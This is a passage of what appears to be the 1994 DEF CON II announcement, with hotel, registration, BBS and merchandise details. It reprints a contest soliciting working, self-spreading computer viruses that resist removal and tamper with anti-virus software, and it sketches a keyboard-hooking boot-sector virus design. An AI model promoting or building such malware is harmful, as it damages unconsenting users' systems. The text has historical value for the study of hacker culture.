8% tax Transportation: Shuttles from the airport for cheap. NOTE: Please make it clear you are registering for the DEF CON II convention to get the room rates. Our convention space price is based on how many people register. Register under a false name if it makes you feel better, 'cuz the more that register the better for my pocket book. No one under 21 can rent a room by themselves, so get your buddy who is 21 to rent for you and crash out. Try to contact people on the Interactive Mailing List (More on that below) and hook up with people. Don't let the hotel people get their hands on your baggage, or there is a mandatory $3 group baggage fee. Vegas has killer unions. OTHER STUFF: I'll whip up a list of stuff that's cool to check out in town there so if for some reason you leave the awesome conference you can take in some unreal sites in the city of true capitalism. If anyone lives in Las Vegas, I would appreciate it if you could send a list of some cool places to check out or where to go to see the best shows and I'll post it in the next announcement or in the program -> I am asking for people to submit to me any artwork, pictures, drawings, logos, etc. that they want me to try and include in this years program. I am trying to not violate any copyright laws, but want cool shit. Send me your art or whatever and I'll try and use it in the program, giving you credit for the work, of course. Please send it in .TIF format if it has more than eight bit color. The program will be eight bit black and white, -> in case you want to make adjustments on your side. PLEASE DONATE "STUFF" FOR THE GIVEAWAY: We are trying to raffle off interesting and old functional items. If you have anything such as old computers, modems, weird radio stuff, books, magazines, etc that you want to get rid of, please call or mail me with what it is, or bring it along. I don't want to waste peoples time giving away rubber bands or anything, but pretty much anything else will go. *** NEW MAILING LIST SERVER *** We've finally gotten Major Domo List Serv software working (Kinda) and it is now ready for testing. MTV spent a lot of time hacking this thing to work with BSDi, and I would like to thank him. The purpose of the list is to allow people interested in DEF CON II to chat with one another. It would be very useful for people over 21 who want to rent hotel space, but split costs with others. Just mention you have room for 'x' number of people, and I'm sure you'll get a response from someone wanting to split costs. Someone also suggested that people could organize a massive car caravan from Southern Ca. to the Con. My attitude is that the list is what you make of it. Here are the specifics: Umm.. I TAKE THAT BACK!! The mailing list is _NOT_ ready yet. Due to technical problems, etc. I'll do another mass mailing to everyone letting them know that the list is up and how to access it. Sorry for the delay! MEDIA: Some of the places you can look for information from last year include: New Media Magazine, September 1993 InfoWorld, 7-12-1993 and also 7-19-1993 by Robert X. Cringely Gray Areas Magazine, Vol 2, #3 (Fall 1993) Unix World, ???, Phrack #44, #45 COST: Cost is whatever you pay for a hotel room split however many ways, plus $15 if you preregister, or $30 at the door. This gets you a nifty 24 bit color name tag (We're gonna make it niftier this year) and your foot in the door. There are fast food places all over, and there is alcohol all over the place but the trick is to get it during a happy hour for maximum cheapness. ============================================================================ I wanted to thank whoever sent in the anonymous fax to Wired that was printed in issue 1.5 Cool deal! ============================================================================= FOR MORE INFORMATION: For InterNet users, there is a DEF CON anonymous ftp site at cyberspace.com in /pub/defcon. There are digitized pictures, digitized speeches and text files with the latest up to date info available. For email users, you can email dtangent@defcon.org for more information. For non-net people call: ---- A L L I A N C E ---- SysOp Metalhead One Thousand One Hundred Megabytes Online 612.251.8596 USRobotics 16.8 Dual Standard Synchronet Multinode BBS Software International Informational Retrieval Guild (IIRG) Distro Site Electronic Frontier Foundation (EFF) MEMBER American Bulletin Board Association (ABBA) MEMBER ----------------------------------------------------------------------- o 200+ Message bases. No post call ratio. Nope, not ever. o FidoNet [1:282/8004] o CyberCrime international [69:4612/2] o International Networked message ECHO areas: UFO, VIRUS, REPTILE, MUSIC, Twin Cities Chat, NORML, Telephone Watch, TRADEWARS, MONTE PYTHON, FCC, NO PIRACY, CLASSIFIEDS BBS Software & SYSOP Support, MUSIC, FISHING/HUNTING, Stephen King, Programming, Computers, Foreign Language, iCE/ACiD/TRiBE, COLLEGE LIVING, POLITICS, POETRY, RACISM, and too many more to mention o Computer Underground Magazines, History, Updates & Text o DEF CON Mirrior Archive o uXu, PHANTASY, CuD, EFF Magazine(s) Distro Site o Internet email mailbox (your.name.here@f8004.n282.z1.fidonet.org) o 30 day FULL ACCESS Trial Account...$10/year MEMBERship (sub. to change) ----------------------------------------------------------------------- For Snail Mail send to: DEF CON, 2709 E. Madison Street Suite #102, Seattle, WA, 98112 For Voice Mail and maybe a human (me), 0-700-TANGENT on an AT&T phone. A DEF CON Mailing list is maintained, and the latest announcements are mailed automatically to you. If you wish to be added to the list just send email to dtangent@defcon.org. ============================================================================= (Note, I have put a copy of Dr. Ludwig's new KOH Data security encryption Virus online at the DEF CON ftp site in /pub/defcon/KOH along with full documentation. Get CrAzY.) VIRUS CREATION AWARDS: Announcing The Second International Virus Writing Contest Sponsored by American Eagle Publications, Inc. P.O. Box 41401 Tucson, AZ 85717 USA and The Crypt Infosystems BBS +1 (818) 683-0854 *** The Goal *** The purpose of this contest is to write a fully functional computer virus that entertains people with political satire. Viruses will be judged on the basis of originality, creativity, functionality, and political incorrectness. *** Eligibility *** Anyone who can write a computer virus is eligible. *** Contest Dates *** The contest is underway from January 1, 1994 until June 30, 1994. Your submissions must be received by June 30 to qualify. The winner of the contest will be announced at the DEFCON conference in Las Vegas, July 22-24, 1994. If you can be present, an official award will be bestowed on you at that time. ************************************************************* Details ************************************************************* The philosopher Friedrik Nietzsche once said that if you want to kill something, you must laugh at it--and laugh at it deeply. So there should be little wonder that political satire is as old as politics itself. Is there something going on in the political arena that you abhor, that makes you sick, that is just plain wrong? Well, here's your chance to make a mockery of it. I've always had this idea that if someone wrote a sufficiently witty virus that really addressed the issues the way the people (not the press, not the politicians) saw them, it might just get passed around by people voluntarily. Let's find out. Write a virus that is itself a political satire. I don't mean a virus that simply displays a message. I mean a living entity whose every move--whose every action--is politically motivated. If you need more than one virus to make your point--perhaps two viruses working together, or something like that, that is fine. ----------------------------------------------------------- Let me give you a simple example: The Political Correctness Virus This virus is a spoof on the "political correctness" movement--which is just a form of self-imposed censorship--that is sweeping American intellectual circles, particularly colleges and universities. This virus is a memory resident boot sector virus which maintains a list of politically incorrect words on your computer system. It also hooks the keyboard interrupt and monitors every keystroke you make. If you type a politically incorrect word into the computer, the PCV springs into action. Politically incorrect words are ranked at three different offense levels. When the PCV encounters such a word, it determines what offense level that word is, and acts accordingly. The least offensive words merely register a beep. More offensive words cause a beep to sound for 10 seconds. The most offensive words cause a siren to sound for two minutes, locking the system for that duration. If you turn the computer off before the two minutes are up, the virus will stop the boot process for five minutes, with sirens, when you turn it back on. If you allow the siren to complete, then you can proceed. The virus has two different word lists, both stored in an encrypted and compressed format. The list is selected at random when the system is infected, after which it cannot be changed. The first list is the "proper" list of political correctness no-no's. For example, a word like "sodomite" is among the worst possible offenses. The second list is an inverted list of no-no's. This list trys to force you to use "sodomite" by flagging words like "gay" and "homosexual" as no-no's. If you allow the PCV to live in your system for three months without getting a single flag, you are given the supreme honor of viewing the word list assigned to you and adding a word to it. If you get more than 3000 flags in a lifetime, the virus will force you to enter a politically correct word before allowing you to start the computer, since you are obviously unwilling to submit to its censorship. The virus also uses powerful means to prevent disinfection, so that, once you get it, you can't get rid of it without a major effort. ------------------------------------------------------------ Now, I know you can get a lot more creative than this--so do it! Design your virus carefully, so that everything it does has meaning. Then send it in. Here are the criteria we'll use: 1. Originality: Your virus must be an original work. Do not send us anything that is not 100% yours. Your message should be original too. Do not just ape what everybody else is saying, especially the media. Also, a refined wit is much to be preferred over vulgarity. Vulgarity is a substitute for original wit. Foul language, porn, etc., are out. Destructive features should be incorporated only if they are VERY appropriate (perhaps if you are commenting on real live genocide in your country, or something like that). In general, though, destructive features will hurt you, not help you. The one exception is modifying anti-virus programs. That is considered to be CONstructive activity. 2. Creativity: Make us laugh, make us cry. Amaze us with how bits and bytes can say something about politics and issues. Think of it like this: displaying a message on the screen is like reading a text file. What we want is the equivalent of a multi-media extravaganza. Use all the system's resources to tell your message. Don't be afraid to write a virus that has some weird mode of infecting programs that tells a story, or to write one that sends faxes to the White House, or sends an automatic request for reams of free information to some government agency. 3. Functionality: The virus has to work. If it only works on some machines, or under some versions of DOS, or what-not, then that will count against you. The better it is at infecting systems and moving around, the better off you will be. So, for example, if you write a file-infector, make sure it can jump directories, and--if you're up to it--migrate across a network. 4. Political incorrectness: Since computer viruses are politically incorrect, their message should be too. If you send us a pro-establishment virus, then you will not win this contest. A word to the wise: think twice about what's correct and what's not. Many positions are only superficially incorrect, though they are really quite fashionable among the establishment. Look at it this way: if you could get a well-written letter expressing your view published in a big city newspaper, then it's not sufficiently incorrect. There are a LOT of ideas that are unofficially censored by society-- especially the media and academia. They tend to make themselves out to be the rebels, but they are really the establishment. If you can't think of anything creatively incorrect and sufficiently obnoxious then you shouldn't be writing viruses in the first place. ************************************************************* How to Submit an Entry You may mail your entry to American Eagle Publications at the above address, or you may e-mail it to ameagle@mcimail.com. Alternatively, you can submit it by dialing the Crypt Infosystems BBS and uploading it there. To get on to the system quickly, efficiently and anonymously, log on as VIRUS, using the password CONTEST. An entry consists of: 1. A complete copy of your virus, both source and executable files. 2. If the political satire isn't perfectly obvious, send a verbal description of how the virus works and why it does what it does. This is especially important if you are not an American and you are commenting on something that has not received worldwide attention. I don't care if you're Bulgarian and you're commenting on something we've never heard of--just make sure you explain it, or we won't understand and you'll lose. 3. If you want to be recognized for your work, include your name (real or handle), and a way we can get in contact with you. By submitting an entry, you grant American Eagle Publications, Inc. the right to publish your virus in any form. You agree not to make your virus public prior to July 25, 1994. If you do, you are automatically disqualified from the contest. For the sake of privacy, you may encrypt your entry and send it in with the following PGP key (which we highly recommend if you have PGP): -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.1 mQCNAi09jVgAAAEEAN3M9LFQXeBprkZuKo5NtuMC+82qNd3/8saHLO6iuGe/eUai 8Vx7yqqpyLjZDGbAS7bvobrcY3IyFeu8PXG4T8sd+g81P0AY0PHUqxxPG3COvBfP oRd+79wB66YCTjKSwd3KVaC7WG/CyXDIX5W6KwCaGL/SFXqRChWdf2BGDUCRAAUR tApDT05URVNUXzk0 =Z20c -----END PGP PUBLIC KEY BLOCK----- Good luck! **************************************************************** P R I Z E S In addition to instant worldwide fame and recognition, you'll get: 1. A cash prize of $100 US. 2. A year's subscription to Computer Virus Developments Quarterly. 3. Your virus will be published in Computer Virus Developments Quarterly, and other fine journals. 4. A handsome engraved plaque recognizing your contribution to the betterment of mankind. 5. A free secret surprise that we cannot tell you about right now, valued at $100. Two runner-ups will receive the secret surprise. !! GO FOR IT !! ============================================================================= STUFF TO SPEND YOUR MONEY ON: > Tapes of last years speakers (four 90 minute tapes) are available for $20 > DEF CON I tee-shirts (white, large only) with large color logo on the front, and on the back the Fourth Amendment, past and present. This is shirt v 1.1 with no type-o's. These are $20, and sweatshirts are $25. > DEF CON II tee-shirts will be made in various colors this year, including a few long sleeve shirts. Sizes will be in XL only again, with few white larges made. Shirts will be $15, Long Sleeve $17, Sweat shirts will be $20. Well, actually, I'll make a small quantity of various stuff, so with luck you'll find something you like. > We will have a few (ten maybe?) embroidered hats with this years logo. Not sure how much they will be.. like $10 maybe. > Full sized 4 color DEF CON II wall posters will be for sale for about $5. > Pre-Register for next year in advance for $15 and save half. > Make all checks/money orders/etc. out to DEF CON, and mail to the address above. Way above. Above the virus awards announcement. If you have any confidential info to send, use this PGP key to encrypt: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3 mQCrAiyI6OcAAAEE8Mh1YApQOOfCZ8YGQ9BxrRNMbK8rP8xpFCm4W7S6Nqu4Uhpo dLfIfb/kEWDyLreM6ers4eEP6odZALTRvFdsoBGeAx0LUrbFhImxqtRsejMufWNf uZ9PtGD1yEtxwqh4CxxC8glNA9AFXBpjgAZ7eFvtOREYjYO6TH9sOdZSa8ahW7YQ hXatVxhlQqve99fY2J83D5z35rGddDV5azd9AAUTtCZUaGUgRGFyayBUYW5nZW50 IDxkdGFuZ2VudEBkZWZjb24ub3JnPg== =ko7s -----END PGP PUBLIC KEY BLOCK----- - The Dark Tangent